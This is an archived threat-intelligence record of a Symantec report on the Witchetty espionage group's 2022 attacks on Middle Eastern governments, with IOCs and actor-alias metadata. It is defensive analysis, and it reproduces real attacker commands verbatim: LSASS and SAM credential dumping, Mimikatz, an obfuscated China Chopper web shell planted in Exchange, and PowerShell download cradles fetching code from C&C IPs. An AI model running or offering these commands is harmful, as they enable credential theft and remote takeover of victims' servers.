{ "id": "04c7801a-3b52-48df-9c09-c4267c23f308", "created_at": "2026-04-06T00:08:02.65355Z", "updated_at": "2026-04-10T03:33:46.11011Z", "deleted_at": null, "sha1_hash": "f809259eee27f4aaac938b49ed4d729dc53ddfcf", "title": "Witchetty: Group Uses Updated Toolset in Attacks on Governments in Middle East", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 57685, "plain_text": "Witchetty: Group Uses Updated Toolset in Attacks on\r\nGovernments in Middle East\r\nBy About the Author\r\nArchived: 2026-04-05 12:50:19 UTC\r\nThe Witchetty espionage group (aka LookingFrog) has been progressively updating its toolset, using new malware\r\nin attacks on targets in the Middle East and Africa. Among the new tools being used by the group is a backdoor\r\nTrojan (Backdoor.Stegmap) that employs steganography, a rarely seen technique where malicious code is hidden\r\nwithin an image.\r\nIn attacks between February and September 2022, Witchetty targeted the governments of two Middle Eastern\r\ncountries and the stock exchange of an African nation. The attackers exploited the ProxyShell (CVE-2021-\r\n34473, CVE-2021-34523, and CVE-2021-31207) and ProxyLogon (CVE-2021-26855 and CVE-2021-27065)\r\nvulnerabilities to install web shells on public-facing servers before stealing credentials, moving laterally across\r\nnetworks, and installing malware on other computers.\r\nWho is Witchetty?\r\nWitchetty was first documented by ESET in April 2022, who concluded that it was one of three sub-groups of\r\nTA410, a broad cyber-espionage operation with some links to the Cicada group (aka APT10). Witchetty’s activity\r\nwas characterized by the use of two pieces of malware, a first-stage backdoor known as X4 and a second-stage\r\npayload known as LookBack. ESET reported that the group had targeted governments, diplomatic missions,\r\ncharities, and industrial/manufacturing organizations.\r\nNew tooling\r\nWhile the group has continued to use the LookBack backdoor, several new pieces of malware appear to have been\r\nadded to its toolset. One is Backdoor.Stegmap, which leverages steganography to extract its payload from a\r\nbitmap image. Although rarely used by attackers, if successfully executed, steganography can be leveraged to\r\ndisguise malicious code in seemingly innocuous-looking image files.\r\nA DLL loader downloads a bitmap file from a GitHub repository. The file appears to be simply an old Microsoft\r\nWindows logo. However, the payload is hidden within the file and is decrypted with an XOR key.\r\nDisguising the payload in this fashion allowed the attackers to host it on a free, trusted service. Downloads from\r\ntrusted hosts such as GitHub are far less likely to raise red flags than downloads from an attacker-controlled\r\ncommand-and-control (C\u0026C) server.\r\nThe payload is a fully featured backdoor capable of executing the following commands:\r\nOther new tools used by the attackers include:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage\r\nPage 1 of 7\n\nCustom proxy utility: This implements a protocol that is quite like SOCKS5, but in this case, the infected\r\ncomputer acts as the server and connects to a C\u0026C server acting as a client, instead of the other way\r\naround.\r\nCustom port scanner: Scans the network ports in the subnet as explained by the banner.\r\nCustom persistence utility: Adds itself to autostart in the registry as “NVIDIA display core component”\r\n(using regsrv32).\r\nWitchetty attack chain\r\nIn one attack against a government agency in the Middle East, the first sign of malicious activity occurred on\r\nFebruary 27, 2022 when the attackers exploited the ProxyShell vulnerability to dump the memory of the Local\r\nSecurity Authority Subsystem Service (LSASS) process using the comsvcs.dll file.\r\nrundll32.exe CSIDL_SYSTEM\\comsvcs.dll, MiniDump 1036\r\nCSIDL_PROFILE\\public\\dm.db full \r\nThe next day, the attackers tried to dump the LSASS process using PowerShell on a different Exchange Server.\r\npowershell -exec bypass $p=Get-Process lsass;$f=New-Object\r\nIO.FileStream('CSIDL_COMMON_MUSIC\\d',[IO.FileMode]::Create);\r\n((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting'))\r\n.GetNestedType('NativeMethods','NonPublic')).GetMethod('MiniDumpWriteDump',\r\n([Reflection.BindingFlags]'NonPublic,Static'))).Invoke($null,@($p.Handle,$p.Id,$f.SafeFileHandle,\r\n([UInt32]2),[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero));$f.Close()\r\nOn March 2, the attackers launched a PowerShell command to obtain a list of Windows Server machines in the\r\nvictim environment.\r\ncmd.exe\" /c powershell -exec bypass Get-ADComputer -Filter\r\n{(OperatingSystem -like \"*windows*server*\") -and (Enabled -eq \"True\")}\r\n-Properties OperatingSystem | Sort Name [REDACTED] select -Unique OperatingSystem\"\r\nMalicious activity ceased until March 18 when the attackers returned to the server and used a custom tool that\r\nresembled Mimikatz (file name: dd.exe).\r\ndd.exe -domain:[REDACTED] -dc:MODDC1.[REDACTED] -user:[REDACTED] -ntlm:[REDACTED] -\r\npwdump -all\r\nMalicious activity again ceased for some time. On April 26 and 27, the attackers ran commands to find the process\r\nidentifier (PID) of the LSASS process and attempted to dump it with the technique previously seen.\r\ncmd /c tasklist | findstr lsass.exe \u003e\u003e CSIDL_WINDOWS\\temp\\8b7db7a3-5376-4d32-8be1-0d3092117022-\r\nmicrosoft.tmp\r\nrundll32 CSIDL_SYSTEM\\comsvcs.dll,minidump 1036\r\nCSIDL_SYSTEM_DRIVE\\inetpub\\wwwroot\\aspnet_client\\temp.rar full\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage\r\nPage 2 of 7\n\nNext, on April 29, the attackers dumped the Security Account Manager (SAM) Registry Hive using the Windows\r\nreg.exe tool.\r\nreg save hklm\\sam CSIDL_SYSTEM_DRIVE\\inetpub\\wwwroot\\aspnet_client\\sam.hive\r\nBetween May 7 and May 9, the attackers checked the PowerShell Execution Policy and then ran the LookBack\r\nbackdoor and registered it as a scheduled task on the server.\r\npowershell Get-ExecutionPolicy  \r\nrundll32 CSIDL_WINDOWS\\immersivecontrolpanel\\ieupdate.dll, curl_share_init\r\nschtasks /create /tn \"InternetExplorerTaskMachineCore\" /sc daily /st 05:30 /tr\r\n\"CSIDL_WINDOWS\\immersivecontrolpanel\\ieupdate.dll\" /ru \"System\" /rl highest\r\nschtasks /run /tn \"InternetExplorerTaskMachineCore\"\r\nBetween June 14 and 18, the attackers used Mimikatz to dump passwords from the LSASS memory. They then\r\nsaved the SAM to a remote location, before launching a PowerShell file named “a.ps1”, creating a new mailbox,\r\nand using the command “makecab” to compress some files, likely for exfiltration.\r\nCSIDL_SYSTEM\\rundll32.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\"\r\nreg save HKLM\\SAM s.dat\r\nreg save HKLM\\SAM \\\\[REDACTED]\\C$\\ProgramData\\Microsoft\\Diagnosis\\s.dat\r\npowershell -PSConsoleFile \"CSIDL_SYSTEM_DRIVE\\program files\\microsoft\\exchange\r\nserver\\v15\\bin\\exshell.psc1\" -file a.ps1\r\npowershell -PSConsoleFile \"CSIDL_SYSTEM_DRIVE\\program files\\microsoft\\\r\nexchange server\\v15\\bin\\exshell.psc1\" -c \"New-Mailbox -Name [REDACTED]  \r\n-UserPrincipalName [REDACTED]  -Password [REDACTED] -String [REDACTED] -AsPlainText -Force)\"\r\nmakecab \\\\[REDACTED]\\c$\\programdata\\microsoft\\drm\\domu.csv \\\\\r\n[REDACTED]\\c$\\programdata\\microsoft\\drm\\domu.cab\r\nOn July 3, the attackers created a scheduled task on a remote computer to run the whoami command and save the\r\noutput to a file. They then configured WinRM to allow connections from any computer.\r\nschtasks /create /s [REDACTED] /u: [REDACTED] /p [REDACTED]\r\n/tn \"BACKUPSEC\" /sc onstart /tr cmd.exe /c whoami \u003e c:\\windows\\temp\\1.txt /ru system /f\r\ncscript //nologo CSIDL_SYSTEM\\winrm.vbs quickconfig -q\r\ncscript //nologo CSIDL_SYSTEM\\winrm.vbs s winrm/config/Client @{TrustedHosts=\"*\"}\r\nBetween July 18 and 26, the attackers used the makecab command again to compress files on a remote server.\r\nThey then used the ProxyLogon exploit to install the China Chopper web shell on this server.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage\r\nPage 3 of 7\n\nmakecab \\\\[REDACTED]\\c$\\programdata\\microsoft\\drm\\Server\\0718.ldf \\\\\r\n[REDACTED]\\c$\\programdata\\microsoft\\drm\\Server\\0718.cab  \r\ncmd /c cd /d \"CSIDL_SYSTEM_DRIVE\\inetpub\\wwwroot\\aspnet_client\" \u0026 echo\u003c%@ Page Language=\"\r\nJscript\"%\u003e\u003c%\\u0065\\u0076\\u0061\\u006c(\\u0052\\u0065\\u0071\\u0075\\u0065\\u0073\\u0074.Item\r\n[\"\\u0043\\u0030\\u0030\\u004b\\u0049\\u0045\"],\"\\u0075\\u006e\\u0073\\u0061\\u0066\\u0065\");%\u003e \u003e\u003e\r\n\"CSIDL_SYSTEM_DRIVE\\program files\\microsoft\\exchange\r\nserver\\v15\\frontend\\httpproxy\\owa\\auth\\15.1.1979\\scripts\\premium\\flogoff.aspx\"\r\nBetween July 20 and 26, the threat actors moved laterally in the network using WMIC and known credentials to\r\ntry to download files from their C\u0026C servers.\r\nwmic /node:[REDACTED] /user:[REDACTED]  /password:[REDACTED]  process call create powershell -exec\r\nbypass (new-object net.webclient).downloadstring('http://194.180.174.254/111')\r\nOn July 21, the attackers ran their custom network scanning tool to discover more computers on the network and\r\ncheck for the open ports on those machines.\r\np.exe -l [IP_LIST] -p [PORT_LIST] -t 5\r\nOn July 28, the attackers again registered a scheduled task on a remote computer to execute the LookBack\r\nbackdoor daily as the system user.\r\ncmd /c cd /d \"CSIDL_WINDOWS\\temp\\temp\" \u0026 schtasks /create /s [REDACTED] /u [REDACTED] /p\r\n[REDACTED] /tn \"SystemControlModel\" /sc DAILY /st 4:40 /tr \"cmd.exe \\c rundll32 \\\"\r\nCSIDL_SYSTEM_DRIVE\\program Files (x86)\\Internet Explorer\\SystemControlModel.dll\\\" curl_share_init\" /ru\r\nsystem /f\r\n On August 1, the backdoor executed on the infected computer.\r\nrundll32 CSIDL_PROGRAM_FILES\\internet explorer\\systemcontrolmodel.dll, curl_share_init\r\nOn August 7, a PowerShell script executed, which, based on the name, seems to output the last login accounts on\r\nthe server.\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell_ise.exe\r\n\"CSIDL_SYSTEM_DRIVE\\report\\getlastloginou.ps1\"  \r\nThe last sign of malicious activity occurred on September 1, when the attackers downloaded remote files,\r\ndecompressed a ZIP file with a deployment tool, executed remote PowerShell scripts, and executed the custom\r\nproxy tool to contact the C\u0026C servers.\r\npowershell -exec bypass (new-object net.webclient).downloadstring('http://185.225.19.55:8080/111')\r\n7.exe e deployer.7z \\\\[REDACTED]\\C$\\windows\\temp\\\r\nwmic /node:[REDACTED] /user:[REDACTED] /password:[REDACTED] process call create cmd /c powershell -\r\nexec bypass (new-object net.webclient).downloadstring('http://185.225.19.55/111.txt')   \r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage\r\nPage 4 of 7\n\nrepro.exe 185.225.19.55 80\r\nCapable threat actor\r\nWitchetty has demonstrated the ability to continually refine and refresh its toolset in order to compromise targets\r\nof interest. Exploitation of vulnerabilities on public-facing servers provides it with a route into organizations,\r\nwhile custom tools paired with adept use of living-off-the-land tactics allow it to maintain a long-term, persistent\r\npresence in targeted organizations.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\n619b64c6728f9ec27bba7912528a4101a9c835a547db6596fa095b3fe628e128       LookBack backdoor\r\ne597aae95dcaccc5677f78d38cd455fa06b74d271fef44bd514e7413772b5dcb         LookBack backdoor\r\nce3293002a9681736a049301ca5ed6d696d0d46257576929efbb638545ecb78e    LookBack backdoor\r\n73bf59c7f6a28c092a21bf1256db04919084aca5924bbd74277f8bda6191b584        LookBack backdoor\r\nacc52983d5f6b86bec6a81bc3fbe5c195b469def733f7677d681f0e405a1049b         LookBack backdoor\r\nf91e44ff423908b6acf8878dced05dc7188ddab39d1040e0d736f96f0a43518d         LookBack backdoor\r\ne7fcc98005cff9f406a5806222612c20dae3e47c469ff6028310847a599d1a38           LookBack backdoor\r\n104873d692af36173cb39f8b46f2080c8ce1a1a52d60c69e1034e2033ba95f7a         Possible LookBack dropper\r\n3b715112ac93e4cd5eaa7760b5670760fd25d0fec68f6a493624fa23c1c6e042         Backdoor.Stegmap\r\n8030d3472eac3c703ae918600a78a6a89800b157d76f333734ed1af5101d04ed     Custom proxy tool\r\n17e60fc72b5398060138f72b3ecb3b09c37243e3b2905df94b7f5b44d6157806       Custom proxy tool\r\n97ccac64927da6f46b3a775d2feb10c271b676e6b124e5bf84e9722c9dc4f093         Custom port scanner\r\n2d5daaae2fe2e7cd6c47ab4c5f824f670969d3fe88bfd3e4512967378c61924d         Custom persistence tool\r\nd8326470d5631e58409401fbadfc8157ee247c32b368fb4be70c2b8f8f88427e        Keylogger\r\na6cf19ab0dc0f0fb9ed4e6da13925a80d92c326a59131991eaf207d92bc61e13        LSASS credential stealer\r\n348d897e952c0f5872c35ea1b15eab802791b865d3c6ad3a27693680a28056cd     Korplug/PlugX loader\r\n1c5ad98a27551e6da3502cdc9ecb232f0d1a343b002c1760f350298fee8df202        Plink\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage\r\nPage 5 of 7\n\ndc13f67a5c52488709056f51a63f3fa1056db71616f83cbb5f1f1949395248be          SecretsDump\r\n16bef09e16119f1754a6b4283e93ff7a17cfdd7c043c3ff05a3d41f128ead52e            FSCAN\r\nd4e2106f9d5294c04ccc02d59882785d548caf4904c8c00446d906bbec2629b2       RAR compressor\r\n31443b7329b1bdbcf0564e68406beabf2a30168fdcb7042bca8fb2998e3f11c5         Mimikatz\r\nc4e9267138cc030e9e87c15c7ff3a15f0a7ece3c39872f354e74842e871e8dc1          Unknown malware\r\n87e507f8fa0f881744afa3a4d5790297bb942230a08134becc150fff511f295b            Unknown malware\r\n59e3bbf97bc08814c56f9aeebaf890a168551d3d9f2ac3efdc8247ecc1732f73         Unknown file\r\n1242d1372ab50a48ad9acec06b4f2a154b072dc494fa392e6647e736135fa636       Corrupted File\r\nf3ae5c2ee98257d0b53d90b62eee18427918af41cb44f8097aa7c3f257c8f7ae         7-Zip file\r\n0b29be26d5caae7cf46eaf9345eea7d9fd7e808b3334e2a2043232d450a648ee      7-Zip file\r\ne27a24e4e99e623566d8a43eb7e562d27c28a7c746d533d36f56312e9a317c2b   7-Zip file\r\n681c22f79e5ec794858172378ed0285ef4da87f4f2dc8545bf304ce1f936529c           China Chopper\r\nbaa5c96ec2c51b601a6808428dbe0dc5e274e2ac65c38c465c5a74a2deb962c6       China Chopper\r\n74b1c46bfda5d2be5c674a6c53c2ad8f4f8d5c5b1cc010f17c6c538e117e013f           China Chopper\r\n5972621204b6503773bfaa58b6aadae073d94c781d89e49557e4d9ecfe4049ab      China Chopper\r\n59bfccc3a6f8e4f737c7b483ec13ba36e53f12af658529a9dd8b0df2b235c0de           China Chopper\r\nd0992dce0769d6ac23076635c902b56daeda17bab5c30f764991c0844141f61f       China Chopper\r\n3859784f390174acc2eeabc82649f7e13f5db592978192b9243c38c254b7e614        China Chopper\r\n1b9e723c70f0a682d4f3a5a7d98a89697b8509a07c8986de041b05806c04d1f9       China Chopper\r\nee5f18e7dcb251a09da9650ac15723b0607282e5befc829d599005a322ac239d      China Chopper\r\n78718feee5ee5683827e5068d73922c8cd2cf297fb1818fb2440babb8d589609       China Chopper\r\ne5f98a1b0d37a09260db033aa09d6829dc4788567beccda9b8fef7e6e3764848       Web shell\r\n469ebdd2f6ecdce9558f3e546ef2814c5e1ad274dcd23bf4613964a0c685d889        Batch script\r\n45549618493cf78facbfedba54e662408b7ebaabe3352119974b6500d11edc85       Batch script\r\nd273b4710800ede37617c3b6e3d58e67e45e6b54556dde468d18e48e006a79f2    Script\r\nd66a019a3cec95b6292215cf6fce4c0837f4b1de3c8af232d11ea291c87db698          Script\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage\r\nPage 6 of 7\n\n57e729442e8d6a06857f71538c0c11a5a49ff5d6136c05f20f391ae9eb95c2da          Script\r\na7baecdbbf55825db281a417a9e11cd8d7b8c3ab5679d2474352091b431c6900     Script\r\n1b75fe197f71809dea790f9d1357c0bb5e396f42dfcd4f966c64f5f71b39a865           Script\r\nde5206a50a0ef8c7f00955ffc2f5034c9d588f8736819387be9f2572666aaa4b           Script\r\n084d4a46bb5b6a1ff7dfc2dd7be6f2023d608f5883e345a67fb98ed22188f1bd         Script\r\n5.252.176[.]3                      LookBack C\u0026C server\r\na.bigbluedc[.]com           LookBack C\u0026C server\r\n185.225.19[.]55                 Remote IP (Malware)\r\n153.92.1[.]125                    Remote IP (Malware)\r\n194.180.174[.]254             Remote IP (Malware)\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "references": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage" ], "report_names": [ "witchetty-steganography-espionage" ], "threat_actors": [ { "id": "ec14074c-8517-40e1-b4d7-3897f1254487", "created_at": "2023-01-06T13:46:38.300905Z", "updated_at": "2026-04-10T02:00:02.918468Z", "deleted_at": null, "main_name": "APT10", "aliases": [ "Red Apollo", "HOGFISH", "BRONZE RIVERSIDE", "G0045", "TA429", "Purple Typhoon", "STONE PANDA", "Menupass Team", "happyyongzi", "CVNX", "Cloud Hopper", "ATK41", "Granite Taurus", "POTASSIUM" ], "source_name": "MISPGALAXY:APT10", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "faa4a29b-254a-45bd-b412-9a1cbddbd5e3", "created_at": "2022-10-25T16:07:23.80111Z", "updated_at": "2026-04-10T02:00:04.753677Z", "deleted_at": null, "main_name": "LookBack", "aliases": [ "FlowingFrog", "LookBack", "LookingFrog", "TA410", "Witchetty" ], "source_name": "ETDA:LookBack", "tools": [ "FlowCloud", "GUP Proxy Tool", "SodomMain", "SodomMain RAT", "SodomNormal" ], "source_id": "ETDA", "reports": null }, { "id": "9ffcbb0c-7a0f-419f-a174-f18a02ce47f1", "created_at": "2023-01-06T13:46:39.059774Z", "updated_at": "2026-04-10T02:00:03.199867Z", "deleted_at": null, "main_name": "TA410", "aliases": [], "source_name": "MISPGALAXY:TA410", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3e8f802c-efba-45ff-8844-5ea4e4a5297d", "created_at": "2023-11-07T02:00:07.092751Z", "updated_at": "2026-04-10T02:00:03.404589Z", "deleted_at": null, "main_name": "Witchetty", "aliases": [ "LookingFrog" ], "source_name": "MISPGALAXY:Witchetty", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ba9fa308-a29a-4928-9c06-73aafec7624c", "created_at": "2024-05-01T02:03:07.981061Z", "updated_at": "2026-04-10T02:00:03.750803Z", "deleted_at": null, "main_name": "BRONZE RIVERSIDE", "aliases": [ "APT10 ", "CTG-5938 ", "CVNX ", "Hogfish ", "MenuPass ", "MirrorFace ", "POTASSIUM ", "Purple Typhoon ", "Red Apollo ", "Stone Panda " ], "source_name": "Secureworks:BRONZE RIVERSIDE", "tools": [ "ANEL", "AsyncRAT", "ChChes", "Cobalt Strike", "HiddenFace", "LODEINFO", "PlugX", "PoisonIvy", "QuasarRAT", "QuasarRAT Loader", "RedLeaves" ], "source_id": "Secureworks", "reports": null }, { "id": "ba3fff0c-3ba0-4855-9eeb-1af9ee18136a", "created_at": "2022-10-25T15:50:23.298889Z", "updated_at": "2026-04-10T02:00:05.316886Z", "deleted_at": null, "main_name": "menuPass", "aliases": [ "menuPass", "POTASSIUM", "Stone Panda", "APT10", "Red Apollo", "CVNX", "HOGFISH", "BRONZE RIVERSIDE" ], "source_name": "MITRE:menuPass", "tools": [ "certutil", "FYAnti", "UPPERCUT", "SNUGRIDE", "P8RAT", "RedLeaves", "SodaMaster", "pwdump", "Mimikatz", "PlugX", "PowerSploit", "ChChes", "cmd", "QuasarRAT", "AdFind", "Cobalt Strike", "PoisonIvy", "EvilGrab", "esentutl", "Impacket", "Ecipekac", "PsExec", "HUI Loader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434082, "ts_updated_at": 1775792026, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f809259eee27f4aaac938b49ed4d729dc53ddfcf.pdf", "text": "https://archive.orkl.eu/f809259eee27f4aaac938b49ed4d729dc53ddfcf.txt", "img": "https://archive.orkl.eu/f809259eee27f4aaac938b49ed4d729dc53ddfcf.jpg" } }